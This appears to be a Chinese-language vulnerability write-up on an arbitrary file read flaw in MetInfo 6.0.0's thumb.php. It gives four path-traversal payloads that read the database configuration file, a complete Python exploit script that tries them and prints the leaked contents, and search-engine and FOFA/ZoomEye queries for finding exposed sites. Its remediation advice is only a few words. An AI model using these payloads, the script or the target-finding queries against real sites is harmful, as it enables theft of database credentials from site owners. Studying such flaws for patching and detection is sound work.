漏洞说明
漏洞描述
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 版本中的 /app/system/include/module/old_thumb.class.php
文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
漏洞等级
高危
影响版本
- MetInfo 6.0.0
漏洞复现
基础环境
漏洞点
/include/thumb.php
第一次测试
/include/thumb.php?dir=..././http/..././config/config_db.php
第二次测试
/include/thumb.php?dir=.....///http/.....///config/config_db.php
第三次测试
/include/thumb.php?dir=http/.....///.....///config/config_db.php
第四次测试
/include/thumb.php?dir=http\..\..\config\config_db.php
注意:
- 此POC 仅适用于Windows 系统,Linux 下无效。
深度利用
EXP 编写
import requests
import sys
banner = """
MetInfo 6.0.0
___________.__.__ __________ .___
\_ _____/|__| | ____ \______ \ ____ _____ __| _/
| __) | | | _/ __ \ | _// __ \\__ \ / __ |
| \ | | |_\ ___/ | | \ ___/ / __ \_/ /_/ |
\___ / |__|____/\___ > |____|_ /\___ >____ /\____ |
\/ \/ \/ \/ \/ \/
- AJEST
Usage: python3 *.py http://10.4.7.130/metinfo_6.0.0
"""
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}
dir_list = [
"..././http/..././config/config_db.php",
".....///http/.....///config/config_db.php",
"http/.....///.....///config/config_db.php",
"http\..\..\config\config_db.php"
]
def attack(host):
vul = "/include/thumb.php"
url = host + vul
res = requests.get(url = url, headers = headers)
if res.status_code != 200:
print(f"[INFO] {vul} is Not Exists!")
exit()
print(f"[INFO] {vul} is Exists!")
for param in dir_list:
params = {
"dir": param
}
res = requests.get(url = url, params = params, headers = headers)
print(f"[INFO] Test URL: {res.url}")
if "<?php" in res.text:
print("[RESULT] The target is vulnreable!")
print(f"[RESULT]\n{res.text}")
break
if len(sys.argv) < 2:
print(banner)
exit()
host = sys.argv[1]
attack(host = host)
漏洞挖掘
指纹信息
传统搜索引擎
Powered by MetInfo 6.0.0
intext:"Powered by MetInfo 6.0.0" inurl:"tw"
FOFA
app="metinfo"
ZoomEye
app:"MetInfo"
app:"MetInfo"+os:"Windows"
修复建议
- 打补丁
- 升级
- 上设备